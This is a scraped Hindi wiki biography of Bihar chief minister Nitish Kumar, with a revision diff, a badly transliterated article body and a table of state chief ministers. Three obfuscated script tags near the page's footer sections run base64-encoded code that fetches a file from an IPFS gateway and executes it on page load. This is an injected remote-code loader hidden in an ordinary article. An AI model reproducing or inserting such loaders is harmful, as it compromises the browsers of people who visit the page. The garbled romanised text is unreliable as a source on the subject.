Difference between revisions of "नितीश कुमार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by the same user not shown)
Line 30: Line 30:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=बिहार के मुख्यमंत्री पद संभालने से पहले नीतीश कुमार को वाजपेयी सरकार में रेल मंत्री, भूतल परिवहन मंत्री और कृषि मंत्री जैसे महत्वपूर्ण पद मिले।
+
|अन्य जानकारी=बिहार के मुख्यमंत्री पद संभालने से पहले नितीश कुमार को वाजपेयी सरकार में रेल मंत्री, भूतल परिवहन मंत्री और कृषि मंत्री जैसे महत्वपूर्ण पद मिले।
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन={{अद्यतन|16:46, 31 दिसम्बर 2017 (IST)}}
 
|अद्यतन={{अद्यतन|16:46, 31 दिसम्बर 2017 (IST)}}
 
}}
 
}}
'''नीतीश कुमार''' ([[अंग्रेज़ी]]: ''Nitish Kumar'', जन्म: 1 मार्च 1951) एक प्रसिद्ध भारतीय राजनीतिज्ञ एवं [[बिहार के मुख्यमंत्री]] हैं। इससे पहले उन्होंने 2005 से 2014 तक बिहार के मुख्यमंत्री और 2015 से 2017, उन्होंने [[भारत सरकार]] के रेल मंत्री के रूप में भी सेवा की। वह जनता दल यूनाइटेड राजनीतिक दल के प्रमुख नेताओं में से हैं। बेहद गंभीर और नपी तुली बातें करने वाले नीतीश कुमार अपने साधारण और ईमानदार व्यक्तित्व के लिए जाने जाते हैं। बिहार की जनता के बीच सुशासन बाबू की छवि वाले नीतीश कुमार का जीवन काफी संघर्ष भरा रहा है लेकिन उन्होंने कभी भी अमर्यादित और अनैतिक भाषा का प्रयोग नहीं किया।
+
'''नितीश कुमार''' ([[अंग्रेज़ी]]: ''Nitish Kumar'', जन्म: [[1 मार्च]] [[1951]]) एक प्रसिद्ध भारतीय राजनीतिज्ञ एवं [[बिहार के मुख्यमंत्री]] हैं। इससे पहले उन्होंने [[2005]] से [[2014]] तक [[बिहार]] के [[मुख्यमंत्री]] और [[2015]] से [[2017]], उन्होंने [[भारत सरकार]] के रेल मंत्री के रूप में भी सेवा की। वह जनता दल यूनाइटेड राजनीतिक दल के प्रमुख नेताओं में से हैं। बेहद गंभीर और नपी तुली बातें करने वाले नितीश कुमार अपने साधारण और ईमानदार व्यक्तित्व के लिए जाने जाते हैं। बिहार की जनता के बीच सुशासन बाबू की छवि वाले नितीश कुमार का जीवन काफी संघर्ष भरा रहा है लेकिन उन्होंने कभी भी अमर्यादित और अनैतिक भाषा का प्रयोग नहीं किया।
 
==जीवन परिचय==
 
==जीवन परिचय==
नीतीश कुमार का जन्म [[बिहार]] के पटना जिले के बख्तियारपुर में [[1 मार्च]] [[1951]] को हुआ। इलेक्ट्रिकल इंजीनियरिंग में उपाधि लेने के बावजूद उन्होंने राजनीति में जाने का फैसला लिया। [[लालू प्रसाद यादव]], [[मुलायम सिंह यादव]] और [[शरद यादव]] की तरह ही नी​तीश कुमार को भी उस समाजवादी आंदोलन से आगे बढ़ने का मौका मिला, जो [[भारत]] में लगी एकमात्र इमरजेंसी की वजह से पैदा हुआ था। [[कांग्रेस]] के विरोध में खड़ी जनता पार्टी के युवा नेताओं में नीतीश कुमार का नाम भी प्रमुखता से लिया जा सकता है। नीतीश ने अपने राजनीतिक जीवन की शुरूआत [[जनता पार्टी]] के कार्यकर्ता के तौर पर ही की। उनका शुरूआती सफर ढेरों ​मुश्किलों से भरा रहा। 1977 में जब जनता दल अपने पूरे परवान पर थी, नी​तीश बाबू को विधानसभा चुनाव में हार का मुँह देखना पड़ा। बिहार के कुर्मी समुदाय के प्रमुख नेता होने की वजह से उन्हें एक बार फिर 1980 में विधानसभा चुनाव में भाग्य आजमाने का मौका दिया गया, लेकिन इस बार भी हार ही उनके हिस्से में आई। लगातार दो बार हारने के बाद उनका आत्मविश्वास नहीं टूटा। परिवार के दबाव के बावजूद वे राजनीति के मैदान में डटे रहे। लगातार काम करते रहे और इन प्रयासों के कारण एक बार फिर 1985 में उन्हें एक बार फिर अपना भाग्य आजमाया और इस बार विजयश्री उनके साथ रही। 1987 में नेतृत्व क्षमता के कारण उन्हें युवा लोकदल का अध्यक्ष चुना गया। यह पहली बार था कि वे किसी महत्वपूर्ण पद का जिम्मा उठा रहे थे। इस जीत के बाद उन्होंने कभी पीछे मुड़कर नहीं देखा और राजनीति में लगातार उनका कद बढ़ता गया। 1989 में उन्हें जनता दल का प्रदेश सचिव चुना गया और पहली बार लोकसभा का चुनाव लड़ने का मौका मिला। इस चुनाव में उन्हें जीत भी मिली और सांसद के साथ केन्द्र में मंत्री बनने का मौका मिला। 1990 के केन्द्रीय मंत्रीमण्डल में उन्हें कृषि राज्य मंत्री के तौर पर काम करने का मौका मिला। जनता पार्टी की टूट से पूरे देश के समाजवादियों को झटका लगा और हरेक राज्य में ढेर सारे छोटे दलों का गठन होने लगा। लालू प्रसाद यादव ने [[राष्ट्रीय जनता दल]] बनाया तो नितिश कुमार ने समता पार्टी का दामन थामा। 1995 में बिहार में हुए चुनावों में नितिश की समता पार्टी को बुरी तरह नकार दिया गया, लेकिन इस बड़ी हार के बावजूद पहले की तरह नितिश एक बार फिर फील्ड में काम करते रहे। नितिश कुमार ने केन्द्रीय मंत्रीमंडल में बतौर रेल मंत्री काम किया और राष्ट्रीय स्तर पर उनकी पहचान स्थापित हुई, लेकिन गैसल में एक दुखद रेल दुर्घटना ​घटित हो गई। नी​तीश कुमार ने घटना की​ जिम्मेदारी लेते हुए पद से इस्तीफा दे दिया। इससे राजनीति में उनका कद बढ़ा।<ref name="dpw">{{cite web |url=http://www.deepawali.co.in/nitish-kumar-biography-hindi-%E0%A4%A8%E0%A5%80%E0%A4%A4%E0%A5%80%E0%A4%B6-%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0.html|title=नीतीश कुमार का जीवन परिचय|accessmonthday=31 दिसंबर|accessyear=2017 |last= |first= |authorlink= |format= |publisher=दीपावली डॉट को डॉ. इन|language=हिंदी }}</ref> अनुशासन और ईमानदारी के लिए जाने वाले नीतीश कुमार की पत्नी अब इस दुनिया में नहीं हैं। वो कभी मुख्यमंत्री सदन में कदम नहीं रख पाईं। नीतीश कुमार का एक बेटा भी है, जिनका नाम निशांत कुमार है। निशांत की अपने पिता नीतीश कुमार से बहुत अच्छी नहीं बनती।  
+
नितीश कुमार का जन्म [[बिहार]] के पटना जिले के बख्तियारपुर में [[1 मार्च]] [[1951]] को हुआ। इलेक्ट्रिकल इंजीनियरिंग में उपाधि लेने के बावजूद उन्होंने राजनीति में जाने का फैसला लिया। [[लालू प्रसाद यादव]], [[मुलायम सिंह यादव]] और [[शरद यादव]] की तरह ही नितीश कुमार को भी उस समाजवादी आंदोलन से आगे बढ़ने का मौका मिला, जो [[भारत]] में लगी एकमात्र इमरजेंसी की वजह से पैदा हुआ था। [[कांग्रेस]] के विरोध में खड़ी जनता पार्टी के युवा नेताओं में नितीश कुमार का नाम भी प्रमुखता से लिया जा सकता है। नितीश ने अपने राजनीतिक जीवन की शुरूआत [[जनता पार्टी]] के कार्यकर्ता के तौर पर ही की। उनका शुरूआती सफर ढेरों ​मुश्किलों से भरा रहा। 1977 में जब जनता दल अपने पूरे परवान पर थी, नितीश बाबू को विधानसभा चुनाव में हार का मुँह देखना पड़ा। बिहार के कुर्मी समुदाय के प्रमुख नेता होने की वजह से उन्हें एक बार फिर 1980 में विधानसभा चुनाव में भाग्य आजमाने का मौका दिया गया, लेकिन इस बार भी हार ही उनके हिस्से में आई। लगातार दो बार हारने के बाद उनका आत्मविश्वास नहीं टूटा। परिवार के दबाव के बावजूद वे राजनीति के मैदान में डटे रहे। लगातार काम करते रहे और इन प्रयासों के कारण एक बार फिर 1985 में उन्हें एक बार फिर अपना भाग्य आजमाया और इस बार विजयश्री उनके साथ रही। 1987 में नेतृत्व क्षमता के कारण उन्हें युवा लोकदल का अध्यक्ष चुना गया। यह पहली बार था कि वे किसी महत्वपूर्ण पद का जिम्मा उठा रहे थे। इस जीत के बाद उन्होंने कभी पीछे मुड़कर नहीं देखा और राजनीति में लगातार उनका कद बढ़ता गया। 1989 में उन्हें जनता दल का प्रदेश सचिव चुना गया और पहली बार लोकसभा का चुनाव लड़ने का मौका मिला। इस चुनाव में उन्हें जीत भी मिली और सांसद के साथ केन्द्र में मंत्री बनने का मौका मिला। 1990 के केन्द्रीय मंत्रीमण्डल में उन्हें कृषि राज्य मंत्री के तौर पर काम करने का मौका मिला। जनता पार्टी की टूट से पूरे देश के समाजवादियों को झटका लगा और हरेक राज्य में ढेर सारे छोटे दलों का गठन होने लगा। लालू प्रसाद यादव ने [[राष्ट्रीय जनता दल]] बनाया तो नितिश कुमार ने समता पार्टी का दामन थामा। 1995 में बिहार में हुए चुनावों में नितिश की समता पार्टी को बुरी तरह नकार दिया गया, लेकिन इस बड़ी हार के बावजूद पहले की तरह नितिश एक बार फिर फील्ड में काम करते रहे। नितिश कुमार ने केन्द्रीय मंत्रीमंडल में बतौर रेल मंत्री काम किया और राष्ट्रीय स्तर पर उनकी पहचान स्थापित हुई, लेकिन गैसल में एक दुखद रेल दुर्घटना ​घटित हो गई। नी​तीश कुमार ने घटना की​ जिम्मेदारी लेते हुए पद से इस्तीफा दे दिया। इससे राजनीति में उनका कद बढ़ा।<ref name="dpw">{{cite web |url=http://www.deepawali.co.in/nitish-kumar-biography-hindi-%E0%A4%A8%E0%A5%80%E0%A4%A4%E0%A5%80%E0%A4%B6-%E0%A4%95%E0%A5%81%E0%A4%AE%E0%A4%BE%E0%A4%B0.html|title=नितीश कुमार का जीवन परिचय|accessmonthday=31 दिसंबर|accessyear=2017 |last= |first= |authorlink= |format= |publisher=दीपावली डॉट को डॉ. इन|language=हिंदी }}</ref> अनुशासन और ईमानदारी के लिए जाने वाले नितीश कुमार की पत्नी अब इस दुनिया में नहीं हैं। वो कभी मुख्यमंत्री सदन में कदम नहीं रख पाईं। नितीश कुमार का एक बेटा भी है, जिनका नाम निशांत कुमार है। निशांत की अपने पिता नितीश कुमार से बहुत अच्छी नहीं बनती।  
 
==राजनीतिक परिचय==
 
==राजनीतिक परिचय==
नीतीश कुमार ने अपने राजनीतिक जीवन की शुरुआत जनता पार्टी के साथ शुरु की। 1977 में जब देश में जनता पार्टी की सरकार थी उस वक्त पार्टी से विधानसभा का चुनाव लड़ने के बाद नीतीश चुनाव हार गए थे फिर 1980  में भी विधानसभा चुनाव में एक बार फिर उन्हें हार का सामना करना पड़ा। इस हार ने उन्हें काफी कुछ सिखाया। घर की आर्थिक स्थिति के कारण राजनीति छोड़कर उन्हें नौकरी करने का पारिवारिक दबाव भी झेलने पड़े इसके बावजूद उन्होंने नौकरी न करने काे अपने दृढ़संकल्प पर कायम रहे। उसके बाद का उनका जीवन बेहद संघर्षपूर्ण रहा। नौकरी नही कोई पूछने वाला नहीं। अपने घर से वे ट्रेन से पटना आते थे और पैदल ही घूमते थे। नीतीश कुमार के पिता जी जो [[सत्येन्द्र नारायण सिंह|सत्येन्द्र नारायण सिन्हा]] के बेहद करीबी थे लेकिन उन्होंने यह कभी नहीं बताया कि उनका बेटा भी राजनीति में हैं। जब सत्येंद्र नारायण सिन्हा 1985 में नीतीश के प्रचार के लिए इलाके में पहुंचे तब उन्हें यह बात पता चली। नीतीश कुमार फिर से 1985 में विधानसभा चुनाव लड़े और विजयी रहे और 1987 में वे युवा लोकदल के अध्यक्ष बने। फिर नीतीश कुमार 1989 जनता दल के प्रदेश सचिव बने और इसी दौरान उन्होंने लोकसभा चुनाव मे जीत दर्ज की। 1995 के विधानसभा चुनाव में नीतीश कुमार की समता पार्टी चुनाव लड़ी लेकिन बुरी तरह हार गई। नीतीश की पार्टी के लोग इधर-उधर चले गए लेकिन नीतीश के हौसले में कोई कमी नही आई। अगस्त 1999 में गैसल में हुई रेल दुर्घटना के बाद नीतीश कुमार ने रेल मंत्री पद छोड़ दिया। इसके बाद 2014 में लोकसभा चुनाव में हार के बाद उन्होंने मुख्यमंत्री पद से इस्तीफा दे दिया। नीतीश कुमार ने 2000 में पहली बार बिहार के मुख्यमंत्री पद की शपथ ली लेकिन सात दिनों के भीतर ही उन्हें इस्तीफा देना पड़ा।<ref>{{cite web |url=https://www.jagran.com/bihar/patna-city-nitish-kumar-created-history-with-will-power-and-patience-13186755.html|title=दृढ इच्छा शक्ति और धैर्य की बदौलत नीतीश ने बनाये नए मुकाम|accessmonthday=31 दिसंबर|accessyear=2017 |last= |first= |authorlink= |format= |publisher=जागरण डॉट कॉम|language=हिंदी }}</ref>
+
नितीश कुमार ने अपने राजनीतिक जीवन की शुरुआत जनता पार्टी के साथ शुरु की। 1977 में जब देश में जनता पार्टी की सरकार थी उस वक्त पार्टी से विधानसभा का चुनाव लड़ने के बाद नितीश चुनाव हार गए थे फिर 1980  में भी विधानसभा चुनाव में एक बार फिर उन्हें हार का सामना करना पड़ा। इस हार ने उन्हें काफी कुछ सिखाया। घर की आर्थिक स्थिति के कारण राजनीति छोड़कर उन्हें नौकरी करने का पारिवारिक दबाव भी झेलने पड़े इसके बावजूद उन्होंने नौकरी न करने काे अपने दृढ़संकल्प पर कायम रहे। उसके बाद का उनका जीवन बेहद संघर्षपूर्ण रहा। नौकरी नही कोई पूछने वाला नहीं। अपने घर से वे ट्रेन से पटना आते थे और पैदल ही घूमते थे। नितीश कुमार के पिता जी जो [[सत्येन्द्र नारायण सिंह|सत्येन्द्र नारायण सिन्हा]] के बेहद करीबी थे लेकिन उन्होंने यह कभी नहीं बताया कि उनका बेटा भी राजनीति में हैं। जब सत्येंद्र नारायण सिन्हा 1985 में नितीश के प्रचार के लिए इलाके में पहुंचे तब उन्हें यह बात पता चली। नितीश कुमार फिर से 1985 में विधानसभा चुनाव लड़े और विजयी रहे और 1987 में वे युवा लोकदल के अध्यक्ष बने। फिर नितीश कुमार 1989 जनता दल के प्रदेश सचिव बने और इसी दौरान उन्होंने लोकसभा चुनाव मे जीत दर्ज की। 1995 के विधानसभा चुनाव में नितीश कुमार की समता पार्टी चुनाव लड़ी लेकिन बुरी तरह हार गई। नितीश की पार्टी के लोग इधर-उधर चले गए लेकिन नितीश के हौसले में कोई कमी नही आई। अगस्त 1999 में गैसल में हुई रेल दुर्घटना के बाद नितीश कुमार ने रेल मंत्री पद छोड़ दिया। इसके बाद 2014 में लोकसभा चुनाव में हार के बाद उन्होंने मुख्यमंत्री पद से इस्तीफा दे दिया। नितीश कुमार ने 2000 में पहली बार बिहार के मुख्यमंत्री पद की शपथ ली लेकिन सात दिनों के भीतर ही उन्हें इस्तीफा देना पड़ा।<ref>{{cite web |url=https://www.jagran.com/bihar/patna-city-nitish-kumar-created-history-with-will-power-and-patience-13186755.html|title=दृढ इच्छा शक्ति और धैर्य की बदौलत नितीश ने बनाये नए मुकाम|accessmonthday=31 दिसंबर|accessyear=2017 |last= |first= |authorlink= |format= |publisher=जागरण डॉट कॉम|language=हिंदी }}</ref>
 
==बिहार के मुख्यमंत्री==
 
==बिहार के मुख्यमंत्री==
2000 में नीतीश कुमार पहली बार [[बिहार के मुख्यमंत्री]] बने लेकिन उनका कार्यकाल महज सात दिन तक चल पाया और सरकार गिर गई। नी​तीश कुमार को इस्तीफा देना पड़ा। उसी साल उन्हें केन्द्रीय मंत्रीमंडल में पिछले अनुभवों को देखते हुए कृषि मंत्री बना दिया गया। [[अटल बिहारी वाजपेयी]] की सरकार में उन्हें एक बार फिर 2001 में रेल मंत्री बना दिया गया। इस बीच उनकी नजर बिहार की राजनीति पर रही। नवम्बर 2005 में उन्हें एक बार फिर पूर्ण बहुमत के साथ बिहार के मुख्यमंत्री बनने का मौका मिला। उन्होंने भाजपा के साथ मिलकर बिहार में गठबंधन की सरकार बनाई। 2010 में एक बार फिर उन्होंने अपने बेहतरीन काम की वजह से जनता का समर्थन मिला और वे तीसरी बार बिहार के मुख्यमंत्री चुने गए। इस गठबंधन सरकार में शामिल भाजपा के साथ उनके मतभेद लगातार बढ़ते गए, जिसका एक प्रमुख कारण भाजपा के प्रधानमंत्री पद के प्रत्याशी [[नरेन्द्र मोदी]] का प्रखर विरोध था। गठबंधन टूट गया लेकिन सरकार चलती रही। 2014 में हुए लोकसभा के चुनावों में पार्टी की बुरी हार की वजह से उन्होंने एक बार फिर अपने पद से इस्तीफा दे दिया और जीतनराम मांझी बिहार के मुख्यमंत्री बने। जीतनराम मांझी के साथ नी​तीश कुमार के मतभेद शुरूआत में ही सामने आने लगे और मतभेद इस कदर बढ़ गए कि पार्टी अपने ही मुख्यमंत्री के खिलाफ हो गई। बिहार में हुए चुनाव में राष्ट्रीय जनता दल के साथ गठबंधन करके उन्होंने हमेशा की तरह एक बार फिर अपने प्रतिद्वंद्वीयों का चौकाया। जनता ने एक बार फिर सुशासन बाबू को चुना। उनके द्वारा किया गया नारा 'बिहार में बहार है, नीतीश कुमार है' काफी मशहूर हुआ है तब से लेकर अब तक बिहार की कमान नीतीश कुमार के हाथ में है।<ref name="dpw"/>
+
2000 में नितीश कुमार पहली बार [[बिहार के मुख्यमंत्री]] बने लेकिन उनका कार्यकाल महज सात दिन तक चल पाया और सरकार गिर गई। नी​तीश कुमार को इस्तीफा देना पड़ा। उसी साल उन्हें केन्द्रीय मंत्रीमंडल में पिछले अनुभवों को देखते हुए कृषि मंत्री बना दिया गया। [[अटल बिहारी वाजपेयी]] की सरकार में उन्हें एक बार फिर 2001 में रेल मंत्री बना दिया गया। इस बीच उनकी नजर बिहार की राजनीति पर रही। नवम्बर 2005 में उन्हें एक बार फिर पूर्ण बहुमत के साथ बिहार के मुख्यमंत्री बनने का मौका मिला। उन्होंने भाजपा के साथ मिलकर बिहार में गठबंधन की सरकार बनाई। 2010 में एक बार फिर उन्होंने अपने बेहतरीन काम की वजह से जनता का समर्थन मिला और वे तीसरी बार बिहार के मुख्यमंत्री चुने गए। इस गठबंधन सरकार में शामिल भाजपा के साथ उनके मतभेद लगातार बढ़ते गए, जिसका एक प्रमुख कारण भाजपा के प्रधानमंत्री पद के प्रत्याशी [[नरेन्द्र मोदी]] का प्रखर विरोध था। गठबंधन टूट गया लेकिन सरकार चलती रही। 2014 में हुए लोकसभा के चुनावों में पार्टी की बुरी हार की वजह से उन्होंने एक बार फिर अपने पद से इस्तीफा दे दिया और जीतनराम मांझी बिहार के मुख्यमंत्री बने। जीतनराम मांझी के साथ नी​तीश कुमार के मतभेद शुरूआत में ही सामने आने लगे और मतभेद इस कदर बढ़ गए कि पार्टी अपने ही मुख्यमंत्री के खिलाफ हो गई। बिहार में हुए चुनाव में राष्ट्रीय जनता दल के साथ गठबंधन करके उन्होंने हमेशा की तरह एक बार फिर अपने प्रतिद्वंद्वीयों का चौकाया। जनता ने एक बार फिर सुशासन बाबू को चुना। उनके द्वारा किया गया नारा 'बिहार में बहार है, नितीश कुमार है' काफी मशहूर हुआ है तब से लेकर अब तक बिहार की कमान नितीश कुमार के हाथ में है।<ref name="dpw"/>
  
  

Latest revision as of 12:29, 24 September 2020

nitish kumar
poora nam nitish kumar
janm 1 march, 1951
janm bhoomi haranaut patana, bihar
pati/patni (svargiy) manjoo kumari sinha
santan nishaant kumar (putr)
nagarikata bharatiy
parti janata dal (yoonaited)
pad bihar ke 22vean mukhyamantri
kary kal 24 navanbar 2005 – 17 mee 2014; 22 faravari 2015 – 26 julaee 2017; 27 julaee 2017 se ab tak
shiksha snatak (maikenikal ianjiniyariang)
vidyalay rashtriy praudyogiki sansthan, patana
bhasha hindi
any janakari bihar ke mukhyamantri pad sanbhalane se pahale nitish kumar ko vajapeyi sarakar mean rel mantri, bhootal parivahan mantri aur krishi mantri jaise mahatvapoorn pad mile.
adyatan‎

nitish kumar (aangrezi: Nitish Kumar, janm: 1 march 1951) ek prasiddh bharatiy rajanitijn evan bihar ke mukhyamantri haian. isase pahale unhoanne 2005 se 2014 tak bihar ke mukhyamantri aur 2015 se 2017, unhoanne bharat sarakar ke rel mantri ke roop mean bhi seva ki. vah janata dal yoonaited rajanitik dal ke pramukh netaoan mean se haian. behad ganbhir aur napi tuli batean karane vale nitish kumar apane sadharan aur eemanadar vyaktitv ke lie jane jate haian. bihar ki janata ke bich sushasan baboo ki chhavi vale nitish kumar ka jivan kaphi sangharsh bhara raha hai lekin unhoanne kabhi bhi amaryadit aur anaitik bhasha ka prayog nahian kiya.

jivan parichay

nitish kumar ka janm bihar ke patana jile ke bakhtiyarapur mean 1 march 1951 ko hua. ilektrikal ianjiniyariang mean upadhi lene ke bavajood unhoanne rajaniti mean jane ka phaisala liya. laloo prasad yadav, mulayam sianh yadav aur sharad yadav ki tarah hi nitish kumar ko bhi us samajavadi aandolan se age badhane ka mauka mila, jo bharat mean lagi ekamatr imarajeansi ki vajah se paida hua tha. kaangres ke virodh mean kh di janata parti ke yuva netaoan mean nitish kumar ka nam bhi pramukhata se liya ja sakata hai. nitish ne apane rajanitik jivan ki shurooat janata parti ke karyakarta ke taur par hi ki. unaka shurooati saphar dheroan ​mushkiloan se bhara raha. 1977 mean jab janata dal apane poore paravan par thi, nitish baboo ko vidhanasabha chunav mean har ka muanh dekhana p da. bihar ke kurmi samuday ke pramukh neta hone ki vajah se unhean ek bar phir 1980 mean vidhanasabha chunav mean bhagy ajamane ka mauka diya gaya, lekin is bar bhi har hi unake hisse mean aee. lagatar do bar harane ke bad unaka atmavishvas nahian toota. parivar ke dabav ke bavajood ve rajaniti ke maidan mean date rahe. lagatar kam karate rahe aur in prayasoan ke karan ek bar phir 1985 mean unhean ek bar phir apana bhagy ajamaya aur is bar vijayashri unake sath rahi. 1987 mean netritv kshamata ke karan unhean yuva lokadal ka adhyaksh chuna gaya. yah pahali bar tha ki ve kisi mahatvapoorn pad ka jimma utha rahe the. is jit ke bad unhoanne kabhi pichhe mu dakar nahian dekha aur rajaniti mean lagatar unaka kad badhata gaya. 1989 mean unhean janata dal ka pradesh sachiv chuna gaya aur pahali bar lokasabha ka chunav l dane ka mauka mila. is chunav mean unhean jit bhi mili aur saansad ke sath kendr mean mantri banane ka mauka mila. 1990 ke kendriy mantrimandal mean unhean krishi rajy mantri ke taur par kam karane ka mauka mila. janata parti ki toot se poore desh ke samajavadiyoan ko jhataka laga aur harek rajy mean dher sare chhote daloan ka gathan hone laga. laloo prasad yadav ne rashtriy janata dal banaya to nitish kumar ne samata parti ka daman thama. 1995 mean bihar mean hue chunavoan mean nitish ki samata parti ko buri tarah nakar diya gaya, lekin is b di har ke bavajood pahale ki tarah nitish ek bar phir phild mean kam karate rahe. nitish kumar ne kendriy mantrimandal mean bataur rel mantri kam kiya aur rashtriy star par unaki pahachan sthapit huee, lekin gaisal mean ek dukhad rel durghatana ​ghatit ho gee. ni​tish kumar ne ghatana ki​ jimmedari lete hue pad se istipha de diya. isase rajaniti mean unaka kad badha.[1] anushasan aur eemanadari ke lie jane vale nitish kumar ki patni ab is duniya mean nahian haian. vo kabhi mukhyamantri sadan mean kadam nahian rakh paeean. nitish kumar ka ek beta bhi hai, jinaka nam nishaant kumar hai. nishaant ki apane pita nitish kumar se bahut achchhi nahian banati.

rajanitik parichay

nitish kumar ne apane rajanitik jivan ki shuruat janata parti ke sath shuru ki. 1977 mean jab desh mean janata parti ki sarakar thi us vakt parti se vidhanasabha ka chunav l dane ke bad nitish chunav har ge the phir 1980 mean bhi vidhanasabha chunav mean ek bar phir unhean har ka samana karana p da. is har ne unhean kaphi kuchh sikhaya. ghar ki arthik sthiti ke karan rajaniti chho dakar unhean naukari karane ka parivarik dabav bhi jhelane p de isake bavajood unhoanne naukari n karane kae apane dridhasankalp par kayam rahe. usake bad ka unaka jivan behad sangharshapoorn raha. naukari nahi koee poochhane vala nahian. apane ghar se ve tren se patana ate the aur paidal hi ghoomate the. nitish kumar ke pita ji jo satyendr narayan sinha ke behad karibi the lekin unhoanne yah kabhi nahian bataya ki unaka beta bhi rajaniti mean haian. jab satyeandr narayan sinha 1985 mean nitish ke prachar ke lie ilake mean pahuanche tab unhean yah bat pata chali. nitish kumar phir se 1985 mean vidhanasabha chunav l de aur vijayi rahe aur 1987 mean ve yuva lokadal ke adhyaksh bane. phir nitish kumar 1989 janata dal ke pradesh sachiv bane aur isi dauran unhoanne lokasabha chunav me jit darj ki. 1995 ke vidhanasabha chunav mean nitish kumar ki samata parti chunav l di lekin buri tarah har gee. nitish ki parti ke log idhar-udhar chale ge lekin nitish ke hausale mean koee kami nahi aee. agast 1999 mean gaisal mean huee rel durghatana ke bad nitish kumar ne rel mantri pad chho d diya. isake bad 2014 mean lokasabha chunav mean har ke bad unhoanne mukhyamantri pad se istipha de diya. nitish kumar ne 2000 mean pahali bar bihar ke mukhyamantri pad ki shapath li lekin sat dinoan ke bhitar hi unhean istipha dena p da.[2]

bihar ke mukhyamantri

2000 mean nitish kumar pahali bar bihar ke mukhyamantri bane lekin unaka karyakal mahaj sat din tak chal paya aur sarakar gir gee. ni​tish kumar ko istipha dena p da. usi sal unhean kendriy mantrimandal mean pichhale anubhavoan ko dekhate hue krishi mantri bana diya gaya. atal bihari vajapeyi ki sarakar mean unhean ek bar phir 2001 mean rel mantri bana diya gaya. is bich unaki najar bihar ki rajaniti par rahi. navambar 2005 mean unhean ek bar phir poorn bahumat ke sath bihar ke mukhyamantri banane ka mauka mila. unhoanne bhajapa ke sath milakar bihar mean gathabandhan ki sarakar banaee. 2010 mean ek bar phir unhoanne apane behatarin kam ki vajah se janata ka samarthan mila aur ve tisari bar bihar ke mukhyamantri chune ge. is gathabandhan sarakar mean shamil bhajapa ke sath unake matabhed lagatar badhate ge, jisaka ek pramukh karan bhajapa ke pradhanamantri pad ke pratyashi narendr modi ka prakhar virodh tha. gathabandhan toot gaya lekin sarakar chalati rahi. 2014 mean hue lokasabha ke chunavoan mean parti ki buri har ki vajah se unhoanne ek bar phir apane pad se istipha de diya aur jitanaram maanjhi bihar ke mukhyamantri bane. jitanaram maanjhi ke sath ni​tish kumar ke matabhed shurooat mean hi samane ane lage aur matabhed is kadar badh ge ki parti apane hi mukhyamantri ke khilaph ho gee. bihar mean hue chunav mean rashtriy janata dal ke sath gathabandhan karake unhoanne hamesha ki tarah ek bar phir apane pratidvandviyoan ka chaukaya. janata ne ek bar phir sushasan baboo ko chuna. unake dvara kiya gaya nara 'bihar mean bahar hai, nitish kumar hai' kaphi mashahoor hua hai tab se lekar ab tak bihar ki kaman nitish kumar ke hath mean hai.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 nitish kumar ka jivan parichay (hiandi) dipavali d aaut ko d aau. in. abhigaman tithi: 31 disanbar, 2017.
  2. dridh ichchha shakti aur dhairy ki badaulat nitish ne banaye ne mukam (hiandi) jagaran d aaut k aaum. abhigaman tithi: 31 disanbar, 2017.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharatiy rajyoan mean padasth mukhyamantri
kramaank rajy mukhyamantri tasvir parti padabhar grahan
1. arunachal pradesh pema khaandoo 80px|center bhajapa 17 julaee, 2016
2. asam himanta bisva sarama 80px|center bhajapa 10 mee, 2021
3. aandhr pradesh vaee es jaganamohan reddi 80px|center vaeeesar kaangres parti 30 mee, 2019
4. uttar pradesh yogi adityanath 80px|center bhajapa 19 march, 2017
5. uttarakhand pushkar sianh dhami 80px|center bhajapa 4 julaee, 2021
6. odisha navin patanayak 80px|center bijoo janata dal 5 march, 2000
7. karnatak siddharamaiya 80px|center bharatiy rashtriy kaangres 20 mee, 2023
8. keral pinaraee vijayan 80px|center marksavadi kamyunist parti 25 mee, 2016
9. gujarat bhoopendr patel 80px|center bhajapa 12 sitambar, 2021
10. gova pramod savant 80px|center bhajapa 19 march, 2019
11. chhattisagadh vishnu dev say 80px|center bharatiy janata parti 13 disambar, 2023
12. jammoo-kashmir rikt (rajyapal shasan) lagoo nahian 20 joon, 2018
13. jharakhand hemant soren 80px|center jharakhand mukti morcha 29 disambar, 2019
14. tamil nadu em. ke. stalin 80px|center dravi d munnetr k dagam 7 mee, 2021
15. tripura manik saha 80px|center bhajapa 15 mee, 2022
16. telangana anumula revant reddi 80px|center bharatiy rashtriy kaangres 7 disanbar, 2023
17. dilli aravind kejarival 80px|center ap 14 faravari, 2015
18. nagalaind nephiyoo riyo 80px|center enadipipi 8 march, 2018
19. panjab bhagavant man 80px|center am adami parti 16 march, 2022
20. pashchim bangal mamata banarji 80px|center trinamool kaangres 20 mee, 2011
21. puducheri en. rangasvami 80px|center kaangres 7 mee, 2021
22. bihar nitish kumar 80px|center jadayoo 27 julaee, 2017
